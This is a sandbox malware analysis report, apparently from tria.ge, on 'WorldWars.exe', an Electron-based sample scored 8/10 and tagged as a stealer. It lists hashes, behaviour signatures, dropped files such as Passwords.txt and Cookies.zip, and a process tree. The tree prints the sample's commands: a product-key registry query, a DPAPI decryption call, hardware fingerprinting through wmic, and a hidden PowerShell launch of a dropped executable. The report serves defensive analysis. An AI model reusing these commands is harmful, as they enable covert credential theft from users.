Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

3

WorldWars.exe

windows10-1703-x64

7

$PLUGINSDI...er.dll

windows10-1703-x64

1

$PLUGINSDI...ls.dll

windows10-1703-x64

3

$PLUGINSDI...em.dll

windows10-1703-x64

3

$PLUGINSDI...ll.dll

windows10-1703-x64

3

$PLUGINSDIR/app-64.7z

windows10-1703-x64

3

LICENSES.c...m.html

windows10-1703-x64

1

WorldWars.exe

windows10-1703-x64

8

chrome_100...nt.pak

windows10-1703-x64

3

chrome_200...nt.pak

windows10-1703-x64

3

d3dcompiler_47.dll

windows10-1703-x64

1

ffmpeg.dll

windows10-1703-x64

1

libEGL.dll

windows10-1703-x64

1

libGLESv2.dll

windows10-1703-x64

1

locales/af.ps1

windows10-1703-x64

3

locales/en-US.pak

windows10-1703-x64

3

locales/uk.ps1

windows10-1703-x64

3

resources.pak

windows10-1703-x64

3

resources/app.asar

windows10-1703-x64

3

resources/elevate.exe

windows10-1703-x64

1

snapshot_blob.bin

windows10-1703-x64

3

v8_context...ot.bin

windows10-1703-x64

3

vk_swiftshader.dll

windows10-1703-x64

1

vk_swiftsh...d.json

windows10-1703-x64

3

vulkan-1.dll

windows10-1703-x64

1

$PLUGINSDI...ec.dll

windows10-1703-x64

3

$PLUGINSDI...7z.dll

windows10-1703-x64

3

$R0/Uninst...rs.exe

windows10-1703-x64

7

$PLUGINSDI...ls.dll

windows10-1703-x64

3

$PLUGINSDI...em.dll

windows10-1703-x64

3

$PLUGINSDI...ll.dll

windows10-1703-x64

3

$PLUGINSDI...ec.dll

windows10-1703-x64

3

Resubmissions

16/07/2024, 12:36

240716-ps1mhswamh 7

16/07/2024, 01:37

240716-b2cedsyhjn 7

16/07/2024, 00:50

240716-a64h1azfkb 8

Analysis

  • max time kernel
    301s
  • max time network
    262s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    16/07/2024, 00:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    WorldWars.exe

  • Size

    154.6MB

  • MD5

    2083e38dc689c08455a74b5201f3ebb2

  • SHA1

    b905d6d3ba73eba3b219ea6de7bb7e42de2605fb

  • SHA256

    5a48729eeb6e105d5849faee5d4888841c02263622e2fdd5b66309186910d7a2

  • SHA512

    6d16116a78aded98f26b44f6277e92f7f3296a752eef8247b3976f718e5b79144f353451687ebde16f6a559d868b25b46a2b9c84dc306c015507ae93efadc528

  • SSDEEP

    1572864:uTmw0ciLNpDPuAvHxJLkY2O6Ea3f9kwZXeT6EivLp1vUAtdjtZn+f4FnIvGaC9dU:pv6E70+Mk

Score
8/10
executionspywarestealer

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\WorldWars.exe
    "C:\Users\Admin\AppData\Local\Temp\WorldWars.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:824
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1580
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2388
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:208
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:2896
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2112
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:1556
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,87,212,196,210,124,230,59,67,161,164,74,188,173,47,152,49,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,42,144,174,75,151,108,166,153,222,237,136,28,87,26,24,82,182,202,107,187,144,164,220,51,246,242,25,119,9,158,46,152,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,176,48,48,10,29,108,244,168,17,173,244,197,21,33,68,36,65,27,172,90,66,1,7,0,101,23,28,241,151,75,50,82,48,0,0,0,214,89,73,239,166,62,101,217,82,172,121,245,141,59,225,236,8,184,155,69,178,175,226,188,29,222,188,22,5,232,234,251,132,97,77,145,69,158,199,224,125,249,24,219,101,156,14,212,64,0,0,0,52,84,202,201,230,21,226,20,45,91,90,45,205,168,20,127,116,11,66,185,143,23,144,32,219,138,94,234,96,214,154,75,20,214,187,201,45,199,214,65,249,116,69,34,116,167,116,77,113,114,200,120,42,103,245,228,226,43,177,204,28,237,76,122), $null, 'CurrentUser')"
      2⤵
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:768
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,87,212,196,210,124,230,59,67,161,164,74,188,173,47,152,49,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,42,144,174,75,151,108,166,153,222,237,136,28,87,26,24,82,182,202,107,187,144,164,220,51,246,242,25,119,9,158,46,152,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,176,48,48,10,29,108,244,168,17,173,244,197,21,33,68,36,65,27,172,90,66,1,7,0,101,23,28,241,151,75,50,82,48,0,0,0,214,89,73,239,166,62,101,217,82,172,121,245,141,59,225,236,8,184,155,69,178,175,226,188,29,222,188,22,5,232,234,251,132,97,77,145,69,158,199,224,125,249,24,219,101,156,14,212,64,0,0,0,52,84,202,201,230,21,226,20,45,91,90,45,205,168,20,127,116,11,66,185,143,23,144,32,219,138,94,234,96,214,154,75,20,214,187,201,45,199,214,65,249,116,69,34,116,167,116,77,113,114,200,120,42,103,245,228,226,43,177,204,28,237,76,122), $null, 'CurrentUser')
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4564
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3632
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic cpu get name
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1240
    • C:\Users\Admin\AppData\Local\Temp\WorldWars.exe
      "C:\Users\Admin\AppData\Local\Temp\WorldWars.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\WorldWars" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1800 --field-trial-handle=1804,i,6384069091323226160,3249909332704969315,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
      2⤵
        PID:2680
      • C:\Users\Admin\AppData\Local\Temp\WorldWars.exe
        "C:\Users\Admin\AppData\Local\Temp\WorldWars.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\WorldWars" --mojo-platform-channel-handle=2184 --field-trial-handle=1804,i,6384069091323226160,3249909332704969315,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:4288
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get ProcessorId"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4068
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic cpu get ProcessorId
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:5028
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get Product"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4668
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic baseboard get Product
          3⤵
            PID:4644
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get SerialNumber"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4680
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic baseboard get SerialNumber
            3⤵
              PID:408
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption"
            2⤵
              PID:96
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic OS get caption
                3⤵
                  PID:4396
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get TotalPhysicalMemory"
                2⤵
                  PID:4320
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic computersystem get TotalPhysicalMemory
                    3⤵
                      PID:2280
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_videocontroller get caption,PNPDeviceID"
                    2⤵
                      PID:4440
                      • C:\Windows\System32\Wbem\WMIC.exe
                        wmic path win32_videocontroller get caption,PNPDeviceID
                        3⤵
                          PID:1236
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get SerialNumber"
                        2⤵
                          PID:5096
                          • C:\Windows\System32\Wbem\WMIC.exe
                            wmic diskdrive get SerialNumber
                            3⤵
                              PID:5052
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
                            2⤵
                              PID:4948
                              • C:\Windows\System32\Wbem\WMIC.exe
                                wmic path win32_computersystemproduct get uuid
                                3⤵
                                  PID:4472
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /d /s /c "powershell -WindowStyle Hidden -Command "& {Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\mt55v.exe' -ArgumentList 'zt43dmuzeM' -WindowStyle Hidden}""
                                2⤵
                                  PID:1152
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -WindowStyle Hidden -Command "& {Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\mt55v.exe' -ArgumentList 'zt43dmuzeM' -WindowStyle Hidden}"
                                    3⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4176
                                    • C:\Users\Admin\AppData\Local\Temp\mt55v.exe
                                      "C:\Users\Admin\AppData\Local\Temp\mt55v.exe" zt43dmuzeM
                                      4⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:436
                                • C:\Users\Admin\AppData\Local\Temp\WorldWars.exe
                                  "C:\Users\Admin\AppData\Local\Temp\WorldWars.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Roaming\WorldWars" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1328 --field-trial-handle=1804,i,6384069091323226160,3249909332704969315,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
                                  2⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:408

                              Network

                              MITRE ATT&CK Enterprise v15

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                Filesize

                                3KB

                                MD5

                                5d574dc518025fad52b7886c1bff0e13

                                SHA1

                                68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7

                                SHA256

                                755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2

                                SHA512

                                21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                Filesize

                                1KB

                                MD5

                                96d660046a866f5d23d49d34293afeda

                                SHA1

                                32eb45e2a1f149223bd44b775a39951ceb8b8357

                                SHA256

                                990f6b9bf66790f2d6744f844cc2c3270387de665cdca0c1bc79195090690c52

                                SHA512

                                a914da9f2a54a31cd64bfe40488e30a370fb04bc8fe680d328ffdbb5c757ebacb6c1b4826da7f06a052dd85af48e00946a9baa235fff1c7c90c53b3b6e3760ff

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                Filesize

                                1KB

                                MD5

                                6a15cfadc614cc97c6a9470ba8582a33

                                SHA1

                                1dc32c10fbe4a128fa76921e3c45b363e027798f

                                SHA256

                                6c3b442efc8f99114eaefb991fed4fe2b02bfc0fbcfc26e82aafe6ede0dd2f78

                                SHA512

                                6797a27fe112a003c456c1bc6fe1c1c443fe941b7b9f2c1b527d90273103b95c8c23d3cd15b4cc2688e65af5b695a95daaea2d7bf654c3ccc00e4ef5889b2fd2

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\Autofills.txt
                                Filesize

                                85B

                                MD5

                                08dc8720082b2ede1ec6e33339f189c1

                                SHA1

                                e1b7e75d052d2ad60f42d400e968a5e9aa91481d

                                SHA256

                                1de83568c3158f5b5e9ae372d31453115a5c166eb83692a6c94ea6c7e1e0387c

                                SHA512

                                e9ed7977ac62e2ae15151e376d6ced8fd44a74cc62499bf61bf094f9862f99c1b8e1128b9a7d4971a6a726e27c559c99a155878297703f5161d9997a0ff0e6d5

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\Cookies.zip
                                Filesize

                                22B

                                MD5

                                76cdb2bad9582d23c1f6f4d868218d6c

                                SHA1

                                b04f3ee8f5e43fa3b162981b50bb72fe1acabb33

                                SHA256

                                8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85

                                SHA512

                                5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\Passwords.txt
                                Filesize

                                14B

                                MD5

                                b4b41665eb819824e886204a28cc610b

                                SHA1

                                e778edb6f635f665c0b512748b8fec6a2a23a88b

                                SHA256

                                635f814c1f34ee53ee62b67f989fec91eb0e08f63769ab4bd22cf4206a2cfff6

                                SHA512

                                37648652b1df14aa427382a4dac70d58a107d3dd77bd1977afc3acce8c56b7b6531b67d33f4b61b9fb8fbb9230ab0dfd461db07c1cc11a2923604e910a743d67

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bl1f3bos.woh.ps1
                                Filesize

                                1B

                                MD5

                                c4ca4238a0b923820dcc509a6f75849b

                                SHA1

                                356a192b7913b04c54574d18c28d46e6395428ab

                                SHA256

                                6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                SHA512

                                4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\mt55v.exe
                                Filesize

                                41.7MB

                                MD5

                                3086eaa607229cc7db53731758a73bc4

                                SHA1

                                0eb46695a5b2c225e60a0bea6d3ccf020793928f

                                SHA256

                                805520950d228007ed5f7ebd994444fbc02b3ba9010cf8408b8b76123981b263

                                SHA512

                                e72f3369c2759f0de5ac2b99058ac0bd1f3b6763a9b6a6a021b3fdab2d8c676dc26908a65ccd617e8cd5d9c589ee6d67434ec18bb5b7d85dc40fe6d9ee450ea7

                                Download Submit

                              • \Users\Admin\AppData\Local\Temp\9cacdd6b-c87e-4b88-bb15-5e6873cc82e1.tmp.node
                                Filesize

                                1.4MB

                                MD5

                                56192831a7f808874207ba593f464415

                                SHA1

                                e0c18c72a62692d856da1f8988b0bc9c8088d2aa

                                SHA256

                                6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c

                                SHA512

                                c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33

                                Download Submit

                              • \Users\Admin\AppData\Local\Temp\pkg\89cbacbc842eb08645bf0b2ea5a03f0a0504a213aa123242343e5588e2f0149c\launcher.node
                                Filesize

                                275KB

                                MD5

                                b0de8894ef937d27715e81eedb6177b9

                                SHA1

                                7a3cce84c94c2a7cfc9b260d219d3738f0f93a99

                                SHA256

                                89cbacbc842eb08645bf0b2ea5a03f0a0504a213aa123242343e5588e2f0149c

                                SHA512

                                9166ddf27a1094817aba685c66bd2fc60d57c4d0961d96931a4e56bac34de339334532196253b676276241d88214e2927b1fc174acaf33296cf8f84e1455b055

                                Download Submit

                              • memory/2388-15-0x000002927E4C0000-0x000002927E536000-memory.dmp

                                Filesize

                                472KB

                                Download

                              • memory/2388-12-0x000002927E310000-0x000002927E332000-memory.dmp

                                Filesize

                                136KB

                                Download

                              • memory/4564-70-0x000001BF21540000-0x000001BF21590000-memory.dmp

                                Filesize

                                320KB

                                Download